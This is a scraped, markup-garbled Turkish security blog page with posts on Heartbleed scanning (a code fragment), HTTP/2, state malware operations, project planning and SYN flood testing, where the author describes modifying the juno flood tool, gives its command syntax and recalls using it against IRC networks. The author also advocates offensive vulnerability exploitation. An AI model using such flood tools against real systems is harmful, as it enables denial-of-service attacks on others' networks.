#666666>./span>EPIPE: span stylecolor: #AA22FF; font-weight: bold>print/span> span stylecolor: #BB4444>' '/span> span stylecolor: #666666>+/span> span stylecolor: #AA22FF>str/span>(target_ip) span stylecolor: #666666>+/span> span stylecolor: #BB4444>' Pipe error.'/span>span stylecolor: #AA22FF; font-weight: bold>if/span> __name__ span stylecolor: #666666>/span> span stylecolor: #BB4444>'__main__'/span>: main()/pre>/div>/blockquote>p> /p>p> /p>div classclear>/div> /div> div classpost-meta> p> span classcategories>Filed under a hrefhttp://www.burakcifter.com/category/blog/ relcategory tag>blog/a>/span> span classtags>Tagged with a hrefhttp://www.burakcifter.com/tag/heartbleed/ reltag>heartbleed/a>, a hrefhttp://www.burakcifter.com/tag/openssl/ reltag>openssl/a>/span> /p> /div> /div> div classpost-164 post type-post status-publish format-standard hentry category-blog tag-http tag-http2 tag-spdy tag-tls> div classentry> h2>a hrefhttp://www.burakcifter.com/http2-kisa-bakis/>HTTP/2 Kısa Bakış/a>/h2> div classpost-info> p> span classtime>July 25, 2015/span> span classpost-comments>a hrefhttp://www.burakcifter.com/http2-kisa-bakis/#respond>Leave a Comment/a>/span> /p> /div> p>Hızlı gelişen internet ve iletişim teknolojileri, dünyada internet ile özdeşleşen ve en yaygın kullanılan protokol olan HTTP için de yenilenmeyi zorunlu hale getirdi. En son 17 yıl önce 1.1 sürümü duyurulan HTTP için 2.0 sürümü için protokol tanımları RFC 7540 ile tanımlanıyor./p>p>En yaygın protokol olması sebebiyle saldırganlar tarafından en yaygın kullanılan atak yüzeylerinden birisi olan HTTP yeni sürümüyle gelen değişiklikler güvenlik çalışmalarında da bazı değişiklikler gerektirecek./p>p>Öncelikle HTTP/2 ile birlikte gelen yeniliklere göz atalım./p>ul>li>En temel yeniliklerin başında işlem bütünleştirme (transaction multiplexing) geliyor. HTTP protokolünde TCP iletişimi başına bir HTTP isteği yapılabilmekteyken, HTTP/2 ile birlikte aynı TCP iletişimi üzerinden düzensiz olarak birden fazla istek gönderip cevap alabilir. Bu sayede her bir istek için ayrı bir TCP iletişimi kurma işlemi gerçekleştirilmesine gerek kalmaz ve performans kazancı sağlanır./li>li>HTTP/1 ve HTTP/1.1’den farklı olarak itekler ve cevaplar metin tabanlı değil, binary tabanlı. Böylelikle metin içerisindeki özel karakterler, satır sonları, boş karakterler vb. gibi uygulamalara göre farklılık gösterebilen durumları standardize edebilecek.. Tabi bunun pratikte bir dezavantajı var, eskisi gibi sadece netcat veya telnet ile HTTP servisine bağlanıp HTTP oturumu açmak mümkün olmayacak./li>li>Bir diğer özellik ise iletişimin artık sadece istemci tarafından sağlanmak zorunda olmaması. HTTP protokolünde bilindiği gibi istemci mutlaka bir istek yapmalı ve buna istinaden gelen cevabı işlemeliydi. HTTP/2 ile birlikte sunucu da kendisine bağlı olan istemciye veri PUSH edebilecek. Yani tarayıcı ilk GET isteğini yorumlayıp da içerisinde sayfayı görüntülemek için ihtiyacı olan diğer elementleri (resim, CSS dosyası gibi) anlayıp bunlar için ayrıca bir GET isteği daha yapmasına gerek kalmadan, sunucu istemciye ilk GET ile birlikte bu dosyaları da iletebilecek./li>li>Bir diğer özellik de istek başlıklarındaki verilerin sıkıştırılması ve bu sayede çerez, oturum, tarayıcı kimliği gibi verilerin daha az yer tutarak iletilmesi./li>/ul>p>Mozilla, Firefox tarayıcısınd HTTP/2’yi sadece TLS şifrelemesi üzerinden destekleyeceğini duyurdu, yüksek ihtimalle Chrome da benzer bir güvenlik zorunluluğu getirecektir. Kendi içerisinde bir şifreleme entegrasyonu olmasa da TLS’i zorunlu tuttuğu sürece HTTP/2 yaygınlaştıkça tüm web trafiği de TLS ile şifreleneceği anlamına geliyor elbette./p>p>Protokollerden ziyade protokollerin implementasyonlarından (hem sunucu hem de istemci tarafında) güvenlik açıkları çıkması çok yaygın. Bunu özellikleve can alıcı şekilde SSL impelemtasyonu olan OpenSSL’de çıkan “Heartbleed” zafiyetinde yaşadık. Her yeni protokol değişikliği bu sebeple biraz ürkütücü geliyor./p>p> /p>p> /p>div classclear>/div> /div> div classpost-meta> p> span classcategories>Filed under a hrefhttp://www.burakcifter.com/category/blog/ relcategory tag>blog/a>/span> span classtags>Tagged with a hrefhttp://www.burakcifter.com/tag/http/ reltag>http/a>, a hrefhttp://www.burakcifter.com/tag/http2/ reltag>http/2/a>, a hrefhttp://www.burakcifter.com/tag/spdy/ reltag>spdy/a>, a hrefhttp://www.burakcifter.com/tag/tls/ reltag>TLS/a>/span> /p> /div> /div> div classpost-156 post type-post status-publish format-standard hentry category-blog tag-apt tag-belgacom tag-cyber-espionag tag-malware tag-quantum-insert tag-siber-istihbarat tag-siber-savas tag-sigint> div classentry> h2>a hrefhttp://www.burakcifter.com/gercek-tehdit-zararli-yazilim/>Gerçek Tehdit Zararlı Yazılım/a>/h2> div classpost-info> p> span classtime>November 16, 2013/span> span classpost-comments>a hrefhttp://www.burakcifter.com/gercek-tehdit-zararli-yazilim/#respond>Leave a Comment/a>/span> /p> /div> p> /p>p>Son ayların sıcak gündemi, Snowden’ın açıkladığı belgelerde ifşa edilen operasyonlar. Denizaltı fiber kabloların dinlenmesi, çok zor ve yapılması da gizli tutulması da oldukça büyük operasyon. Bu operasyon, gözümüzden kaçmaması gereken diğer bilgileri gözümüzden kaçırmamalı. Hatları ve trafiği takip etme kullanılmaya devam edecek olsa da, özellikle dolaşıma açılmayan kritik verileri elde etmek veya seçilmiş/tanımlı bir hedefe bu yollarla ulaşmak mümkün değil. Snowden’in açıkladığı operasyonlardan birisi de, Belçika’nın en büyük telekom operatörü olan BELGACOM’a yönelik zararlı yazılım (malware) kullanarak gerçekleştirilen “Quantum Insert” operasyonu./p>p>Stratejik ve operasyonel istihbarat için analiz edilmesi gereken ham verileri elde etmek için taktik operasyonlar ile sızma yerine şebekeler üzerinden sistemlere veya kişilere erişmek, operasyonların yeni kimliği haline geldi. Quantum Insert, Stuxnet ve Çin’de keşfedilen Unit-61398 öncesinde belki de zararlı yazılımlar kullanılarak sızma ve bilgi toplama operasyonlarına şüpheyle bakılıyor ve hayalci bulunuyordu. Fakat hem gerçekleştirilen somut saldırılar hem de ABD ve Çin devletlerinin üst düzey yöneticilerinin söylemleri neticesinde; bu operasyonların artık “güzel bir hayal” olmadığına geleneksel istihbarat şeflerini ikna etti. Hatta bu yöntemlere hâkim olmayan istihbarat birimlerinin diğer ülkelerin birimlerinden geri kaldığı da bir anda ortaya çıkmış oldu./p>p>Zararlı yazılımlar, güvenlik zafiyetlerinin ofansif yaklaşımıyla gerçek bir amaç için silahlandırılmasıdır. 1995-2003 arasında bize büyük bir dünya gibi gelen güvenlik açıkları, her ne kadar tek başına hala birçok sisteme erişim kazanmamızı sağlasalar da, gün geçtikçe tek başına anlamsız hale gelmekteler. Nasıl ki artık bir zafiyetten ziyade zafiyeti başarılı ve hatasız kullanan suiistimal yazılımı daha kıymetliyse; aynı şekilde bir suiistimal kodundan ziyade bir amaç etrafında birleşmiş çeşitli suiistimal kodlarını kullanan zararlı yazılımlar daha kıymetlidir. Eğer suiistimal kodları, zafiyetlerin silahlandırılmış haliyse; zararlı yazılımlar da bu silahların güdümlü ve akıllı hale getirişmiş yeni sürümleridir./p>p>Hedefli saldırılar için kullanılan gelişmiş zararlı yazılımlar, hem bilgi güvenliğinin hem de istihbarat çalışmalarının geleceği durumuna geldi./p>p>Fiber dinleme operasyonlarının oluşturduğu risk yadsınamaz. Fakat beni bugünlerde asıl endişelendiren, şu anda ülkenin kritik kurumlarında, endüstriyel tesislerinde, askeri altyapılarında tam olarak hedefini bulmuş olan ve varlığından dahi haberdar olmadığımız zararlı yazılımlar. Kullandığımız donanımların da işletim sistemlerinin de bize özgü olmadığı her platform, fiziksel olarak izole olduğu ve internetle bağlantısı bulunmadığı söylense de, hedefe yönelik geliştirilmiş zararlı yazılım saldırıları için hedef durumunda./p>p>Tabi bunun bir diğer ucu da bizim lehimize. Aynı sistemler başka ülkelerin de elinde olduğu için, bir yandan da fırsat. Benzer operasyonları kendimiz de gerçekleştirebilir. Sistemlerin her ne kadar kaynak kodlarına sahip olmasak da, geliştiricileri bize belirli arka kapılar açmasalar da; bugüne kadar kapalı sistemlerde bulunan açıklar zaten bu imkânlar ile keşfedilmedi. Tersine mühendislik ve zafiyet araştırmaları, bu sistemleri analiz edip açıklarını bulmak için var. Bu yeni nesil saldırıların mağdur tarafı olmaktansa bu zafiyetleri keşfederek aktif olarak bunlardan faydalanan taraf olmak gerekiyor./p>p> /p>p> /p>p> /p>div classclear>/div> /div> div classpost-meta> p> span classcategories>Filed under a hrefhttp://www.burakcifter.com/category/blog/ relcategory tag>blog/a>/span> span classtags>Tagged with a hrefhttp://www.burakcifter.com/tag/apt/ reltag>apt/a>, a hrefhttp://www.burakcifter.com/tag/belgacom/ reltag>belgacom/a>, a hrefhttp://www.burakcifter.com/tag/cyber-espionag/ reltag>cyber espionag/a>, a hrefhttp://www.burakcifter.com/tag/malware/ reltag>malware/a>, a hrefhttp://www.burakcifter.com/tag/quantum-insert/ reltag>quantum insert/a>, a hrefhttp://www.burakcifter.com/tag/siber-istihbarat/ reltag>siber istihbarat/a>, a hrefhttp://www.burakcifter.com/tag/siber-savas/ reltag>siber savas/a>, a hrefhttp://www.burakcifter.com/tag/sigint/ reltag>sigint/a>/span> /p> /div> /div> div classpost-146 post type-post status-publish format-standard hentry category-blog tag-ar-ge tag-basari tag-istisare tag-proje tag-yazilim-projesi> div classentry> h2>a hrefhttp://www.burakcifter.com/planlanan-ve-gerceklesen/>Planlanan ve Gerceklesen/a>/h2> div classpost-info> p> span classtime>November 7, 2013/span> span classpost-comments>a hrefhttp://www.burakcifter.com/planlanan-ve-gerceklesen/#respond>Leave a Comment/a>/span> /p> /div> p>a hrefhttp://www.burakcifter.com/wp-content/uploads/2013/11/ac412d4c-46e0-11e3-a62b-22000a9aa503-large1.jpg>img decodingasync classaligncenter size-full wp-image-147 altac412d4c-46e0-11e3-a62b-22000a9aa503-large1 srchttp://www.burakcifter.com/wp-content/uploads/2013/11/ac412d4c-46e0-11e3-a62b-22000a9aa503-large1.jpg width398 height296 srcsethttp://www.burakcifter.com/wp-content/uploads/2013/11/ac412d4c-46e0-11e3-a62b-22000a9aa503-large1.jpg 398w, http://www.burakcifter.com/wp-content/uploads/2013/11/ac412d4c-46e0-11e3-a62b-22000a9aa503-large1-300x223.jpg 300w sizes(max-width: 398px) 100vw, 398px />/a>Bilgi Guvenligi ile hic bir alakasi yok ama, bu resim bugun LinkedIN’de gordum ve uzerine aklimdan gecenleri paylasmak istedim./p>p>Bu resim “ya, evet, boyle oluyor” diye dovunerek paylasmak pek anlam ifade etmiyor. Buradan dersler cikartmak lazim./p>ul>li>Hedef olarak koydugunuz noktaya zaten asla duz sekilde gidemeyeceginizi aklinizdan cikartmayin./li>li>Istisare edin. Hedefinizin kesinlikle dogru olduguna inansaniz da, belki birisi size gidecek daha dogru (kolay degil, dogru) bir yol gosterebilir./li>li>Planinizin tamamina degil, her adimina ayri ayri “tampon” bolgeler/sureler koyun./li>li>Karsilasilabilecek risklerin sadece isinizle veya kendinizle degil, cevrenizdeki insanlarin ruh haliyle de ilgili olabilecegini degerlendirin. Zira, uzun yollar ana planda tek kisilik olsa da, alt basliklari muhakkak farkli degiskenlere/olaylara, bu olaylarin da sizin istediginiz surelerde tamamlanmasina baglidir./li>li>Ozellike yazilim projeleri asla duz bir yol degildir. Ekibinizin yeni kutuphaneleri ogrenmesi(oyuna girmesi), birbirine uyum saglamasi (diger 11 oyuncuyu tanimasi), yazilimin vizyonunu ve konseptini kavramasi (hakemi ve sahanin zeminini ogrenmesi) zaman alir. Butun bunlar ilk seferde basariya da ulasmayabilir. Deneyip yanilarak elde edecekleri bu deneyimler, yolunuzu duz olmaktan cikartir. Duz yol beklentisi ile genis capli yazilim projelerine, ozellikle ar-ge projelerine girmeyin./li>li>Mumkunse, o yoldan daha once gitmis birkac kisi ile surekli irtibatta olur./li>li>Zemini ve gidilecek yolu cok cok cok ve biraz daha cok etud etmeden yola cikmayin. Her detayini tek tek sirasiyla dusunup, tek bir hamleyle kalkip yola cikin./li>li>Ar-ge projelerinde bu oldukca zor, zira yeni bir konsept ortaya koyarken zaten neyi bilmediginizi ve ne ile karsilasabileceginizi ongoremediginiz icin bunun adi “arastirma ve gelistirme”. Ar-ge calismalarinda ilk resimi beklemek zaten dogru degil, aklinizda bulunsun./li>/ul>p> /p>p>Son olarak, bence bu fotografin fikri “hic bir sey gorundugu kadar kolay degildir” degil. Dogrusu “Dogru bakip duzgun etud etmezsen tuttugun yoldan hayir gelmez” olmali 🙂/p>div classclear>/div> /div> div classpost-meta> p> span classcategories>Filed under a hrefhttp://www.burakcifter.com/category/blog/ relcategory tag>blog/a>/span> span classtags>Tagged with a hrefhttp://www.burakcifter.com/tag/ar-ge/ reltag>ar-ge/a>, a hrefhttp://www.burakcifter.com/tag/basari/ reltag>basari/a>, a hrefhttp://www.burakcifter.com/tag/istisare/ reltag>istisare/a>, a hrefhttp://www.burakcifter.com/tag/proje/ reltag>proje/a>, a hrefhttp://www.burakcifter.com/tag/yazilim-projesi/ reltag>yazilim projesi/a>/span> /p> /div> /div> div classpost-141 post type-post status-publish format-standard hentry category-blog tag-big-data tag-hadoop tag-microsoft> div classentry> h2>a hrefhttp://www.burakcifter.com/microsoft-ve-big-data/>Microsoft ve Big Data/a>/h2> div classpost-info> p> span classtime>November 2, 2013/span> span classpost-comments>a hrefhttp://www.burakcifter.com/microsoft-ve-big-data/#respond>Leave a Comment/a>/span> /p> /div> p>Microsoft’un bu alandaki calismasi nedir diye bakayim dedim. Hatta “kesin SQL Server Big Data Edition” diye bir sey cikartmislardir diye dalga geciyordum 🙂 Daha da umitsiz durumdalarmis. Buldugum bigdatasolutionsheet.pdf’deki girisi oldugu gibi aktariyorum/p>p>a hrefhttp://www.burakcifter.com/wp-content/uploads/2013/11/Microsoft-on-Big-Data-1.png>img loadinglazy decodingasync classsize-full wp-image-142 alignleft altMicrosoft on Big Data 1 srchttp://www.burakcifter.com/wp-content/uploads/2013/11/Microsoft-on-Big-Data-1.png width388 height195 srcsethttp://www.burakcifter.com/wp-content/uploads/2013/11/Microsoft-on-Big-Data-1.png 777w, http://www.burakcifter.com/wp-content/uploads/2013/11/Microsoft-on-Big-Data-1-300x150.png 300w sizesauto, (max-width: 388px) 100vw, 388px />/a>/p>p> /p>p> /p>p> /p>p> /p>p> /p>p> /p>p> /p>p>*nocomment*/p>div classclear>/div> /div> div classpost-meta> p> span classcategories>Filed under a hrefhttp://www.burakcifter.com/category/blog/ relcategory tag>blog/a>/span> span classtags>Tagged with a hrefhttp://www.burakcifter.com/tag/big-data/ reltag>big data/a>, a hrefhttp://www.burakcifter.com/tag/hadoop/ reltag>hadoop/a>, a hrefhttp://www.burakcifter.com/tag/microsoft/ reltag>microsoft/a>/span> /p> /div> /div> div classpost-133 post type-post status-publish format-standard hentry category-uncategorized tag-encryption tag-practical tag-pratik> div classentry> h2>a hrefhttp://www.burakcifter.com/pratik-hayat-onerileri/>Pratik Hayat Onerileri/a>/h2> div classpost-info> p> span classtime>July 20, 2013/span> span classpost-comments>a hrefhttp://www.burakcifter.com/pratik-hayat-onerileri/#respond>Leave a Comment/a>/span> /p> /div> p>Denedim, 100% calisiyor! 🙂/p>p> /p>p>img loadinglazy decodingasync alt srchttps://pbs.twimg.com/media/BPmGMJWCUAAgxQ7.jpg:large width512 height313 />/p>div classclear>/div> /div> div classpost-meta> p> span classcategories>Filed under a hrefhttp://www.burakcifter.com/category/uncategorized/ relcategory tag>Uncategorized/a>/span> span classtags>Tagged with a hrefhttp://www.burakcifter.com/tag/encryption/ reltag>encryption/a>, a hrefhttp://www.burakcifter.com/tag/practical/ reltag>practical/a>, a hrefhttp://www.burakcifter.com/tag/pratik/ reltag>pratik/a>/span> /p> /div> /div> div classpost-112 post type-post status-publish format-standard hentry category-blog tag-ddos tag-dos tag-juno tag-syn-flood> div classentry> h2>a hrefhttp://www.burakcifter.com/syn-flood-testleri/>SYN Flood Testleri/a>/h2> div classpost-info> p> span classtime>June 23, 2013/span> span classpost-comments>a hrefhttp://www.burakcifter.com/syn-flood-testleri/#respond>Leave a Comment/a>/span> /p> /div> p>Bu aralar DoS/DDoS saldirilari cok ayaga dustu malum, o sebeple bir cok yonetici kendi sistemlerinin bu tip saldirilara karsi ne kadar dayanikli oldugunu test etmek istiyor./p>p>Layer7/uygulama katmaninda yapilan flood saldirilari spoofed ip’lerle yapilamayacagi icin genellikle botnet’lerle gerceklestirilse de, hala en yaygin saldirilarin basinda SYN Flood saldirilari var. Cunku ;/p>p>1. uygulamasi cok kolay/p>p>2. etkisi yuksek./p>p>Yillardir tabi bunun icin syncookie enable, tcp timeout suresini dusurme gibi bir cok optimizasyon yolu mevcut lakin PPS yukseldikce bildiginiz gibi ag girisindeki sistemler hatta bazen(cogunlukla) uygun olmayan veya duzgun ayarlanmamis IPS ve Firewall sistemleri servis veremez duruma geliyor, beraberinde de agin tamamini erisilmez kiliyor./p>p>SYN Flood saldirilarinda juno araci cok yaygin sekilde kullanilir. Hatta ben kendimi bildim bileli, henuz 2000 olmamisken dahi iRC network’lerine saldirmak icin bol bol kullandigimiz bir aracti 🙂/p>p>Simdi bunu kullanip kendi sistemlerini test etmek isteyen sistem yoneticileri, normal sekilde juno’yu kurduklarinda olculebilir bir test yapamazlar zira siz durdurana kadar calismaya devam eder. Istediginiz sayida paket gonderilmesi icin ben de opsiyonel bir parametre ekledim, boylelikle legal kullanima ve sistemleri test etmeye daha yatkin hale geldi. Hazir el atmisken ciktilarinda da biraz makyaj yaptim./p>blockquote>p>Syntax: ./juno <target ip> <target port> packet count (optional)/p>/blockquote>p> /p>p>packet count icin bir deger vermezseniz yine eski usul siz kesene kadar calisiyor./p>p>a hrefhttp://www.burakcifter.com/wp-content/uploads/2013/06/juno-new1.png>img loadinglazy decodingasync classaligncenter size-full wp-image-117 altjuno-new srchttp://www.burakcifter.com/wp-content/uploads/2013/06/juno-new1.png width620 height213 srcsethttp://www.burakcifter.com/wp-content/uploads/2013/06/juno-new1.png 620w, http://www.burakcifter.com/wp-content/uploads/2013/06/juno-new1-300x103.png 300w sizesauto, (max-width: 620px) 100vw, 620px />/a>/p>p> a hrefhttp://www.burakcifter.com/syn-flood-testleri/#more-112 classmore-link>Read more of this post/a>/p>div classclear>/div> /div> div classpost-meta> p> span classcategories>Filed under a hrefhttp://www.burakcifter.com/category/blog/ relcategory tag>blog/a>/span> span classtags>Tagged with a hrefhttp://www.burakcifter.com/tag/ddos/ reltag>ddos/a>, a hrefhttp://www.burakcifter.com/tag/dos/ reltag>dos/a>, a hrefhttp://www.burakcifter.com/tag/juno/ reltag>juno/a>, a hrefhttp://www.burakcifter.com/tag/syn-flood/ reltag>syn flood/a>/span> /p> /div> /div> div classpost-100 post type-post status-publish format-standard hentry category-blog tag-cyber-warfare tag-mgk tag-milli-guevnlik tag-siber-savas> div classentry> h2>a hrefhttp://www.burakcifter.com/milli-guvenlik-kurulu-bildirisinde-siber-tehditler/>Milli Güvenlik Kurulu Bildirisinde Siber Tehditler/a>/h2> div classpost-info> p> span classtime>October 20, 2012/span> span classpost-comments>a hrefhttp://www.burakcifter.com/milli-guvenlik-kurulu-bildirisinde-siber-tehditler/#respond>Leave a Comment/a>/span> /p> /div> p>Sonunda “devletin” en üst makamlarının koordinasyonunun sağlandığı Milli Güvenlik Kurulu’nun gündemine “Siber Tehditler” de alındı ve artık resmi olarak tehdit algısı olarak kaydedildi./p>p>Milli Güvenlik Kurulu’nun 19 Ekim tarihli bildirisindeki son madde şu şekilde:/p>blockquote>p>“Toplantıda son olarak, küresel düzeyde ciddi boyutlara ulaşan siber tehdit ve bu tehdidin ülkemizin güvenliğine etkileri değerlendirilmiş, bu tür tehditlerin engellenmesi ve siber güvenliğimizin sağlanmasına yönelik ulusal düzeyde koordinasyon ve uluslararası düzeyde işbirliğinin gerekliliğine vurgu yapılmıştır.”/p>/blockquote>p>Duyduğuma göre UDH Bakanı Binali Bey de bu konuda bir sunum yapmak üzere MGK’ya davet edildi ve konuyla ilgili brifing verdi./p>p>Güzel gelişme, sonraki adım artık “Ulusal Siber Koordinasyon Kurulu”‘nun resmi olarak faaliyete geçmesi./p>p> /p>div classclear>/div> /div> div classpost-meta> p> span classcategories>Filed under a hrefhttp://www.burakcifter.com/category/blog/ relcategory tag>blog/a>/span> span classtags>Tagged with a hrefhttp://www.burakcifter.com/tag/cyber-warfare/ reltag>cyber warfare/a>, a hrefhttp://www.burakcifter.com/tag/mgk/ reltag>mgk/a>, a hrefhttp://www.burakcifter.com/tag/milli-guevnlik/ reltag>milli güevnlik/a>, a hrefhttp://www.burakcifter.com/tag/siber-savas/ reltag>siber savas/a>/span> /p> /div> /div> div classnavlink> div classnav-previous>p>a hrefhttp://www.burakcifter.com/page/2/ >span classmeta-nav>←/span> Older posts/a>/p>/div> div classnav-next>p>/p>/div> /div> /div>div idsidebar> div idsearch-2 classwidget widget_search>form rolesearch methodget idsearchform classsearchform actionhttp://www.burakcifter.com/> div> label classscreen-reader-text fors>Search for:/label> input typetext value names ids /> input typesubmit idsearchsubmit valueSearch /> /div> /form>/div> div idrecent-posts-2 classwidget widget_recent_entries> h4>Recent Posts/h4> ul> li> a hrefhttp://www.burakcifter.com/mirai-bot-teknik-analizi/>Mirai Bot Teknik Analizi/a> /li> li> a hrefhttp://www.burakcifter.com/turkiyenin-botnet-durumu/>Türkiye’nin Botnet Durumu/a> /li> li> a hrefhttp://www.burakcifter.com/heartbleed-scanner/>Heartbleed Scanner/a> /li> li> a hrefhttp://www.burakcifter.com/http2-kisa-bakis/>HTTP/2 Kısa Bakış/a> /li> li> a hrefhttp://www.burakcifter.com/gercek-tehdit-zararli-yazilim/>Gerçek Tehdit Zararlı Yazılım/a> /li> /ul> /div>div idrecent-comments-2 classwidget widget_recent_comments>h4>Recent Comments/h4>ul idrecentcomments>/ul>/div>div idarchives-2 classwidget widget_archive>h4>Archives/h4> ul> li>a hrefhttp://www.burakcifter.com/2016/12/>December 2016/a>/li> li>a hrefhttp://www.burakcifter.com/2016/10/>October 2016/a>/li> li>a hrefhttp://www.burakcifter.com/2015/09/>September 2015/a>/li> li>a hrefhttp://www.burakcifter.com/2015/07/>July 2015/a>/li> li>a hrefhttp://www.burakcifter.com/2013/11/>November 2013/a>/li> li>a hrefhttp://www.burakcifter.com/2013/07/>July 2013/a>/li> li>a hrefhttp://www.burakcifter.com/2013/06/>June 2013/a>/li> li>a hrefhttp://www.burakcifter.com/2012/10/>October 2012/a>/li> li>a hrefhttp://www.burakcifter.com/2012/09/>September 2012/a>/li> li>a hrefhttp://www.burakcifter.com/2012/08/>August 2012/a>/li> li>a hrefhttp://www.burakcifter.com/2012/07/>July 2012/a>/li> li>a hrefhttp://www.burakcifter.com/2012/04/>April 2012/a>/li> li>a hrefhttp://www.burakcifter.com/2012/03/>March 2012/a>/li> li>a hrefhttp://www.burakcifter.com/2012/02/>February 2012/a>/li> li>a hrefhttp://www.burakcifter.com/2011/12/>December 2011/a>/li> li>a hrefhttp://www.burakcifter.com/2011/09/>September 2011/a>/li> /ul> /div>div idcategories-2 classwidget widget_categories>h4>Categories/h4> ul> li classcat-item cat-item-21>a hrefhttp://www.burakcifter.com/category/blog/>blog/a>/li> li classcat-item cat-item-1>a hrefhttp://www.burakcifter.com/category/uncategorized/>Uncategorized/a>/li> /ul> /div>div idmeta-2 classwidget widget_meta>h4>Meta/h4> ul> li>a hrefhttp://www.burakcifter.com/wp-login.php>Log in/a>/li> li>a hrefhttp://www.burakcifter.com/feed/>Entries feed/a>/li> li>a hrefhttp://www.burakcifter.com/comments/feed/>Comments feed/a>/li> li>a hrefhttps://wordpress.org/>WordPress.org/a>/li> /ul> /div>/div>/div>div idfooter> div classfooterleft> p>a hrefhttp://wordpress.com/ relgenerator>Get a free blog at WordPress.com/a>/p> /div> div classfooterright> Theme: Enterprise by a hrefhttp://www.studiopress.com/ reldesigner>StudioPress/a>. /div>/div>/div>script typetext/javascript idmt-brushtypes-js-extra>/* !CDATA */var MTBrushParams {baseUrl:http:\/\/www.burakcifter.com\/wp-content\/plugins\/syntax-highlighter-mt};/* > *//script>script typetext/javascript srchttp://www.burakcifter.com/wp-content/plugins/syntax-highlighter-mt/brushTypes.js?ver2.2.5 idmt-brushtypes-js>/script>/body>/html>
View on OTX
|
View on ThreatMiner
Please enable JavaScript to view the
comments powered by Disqus.
Data with thanks to
AlienVault OTX
,
VirusTotal
,
Malwr
and
others
. [
Sitemap
]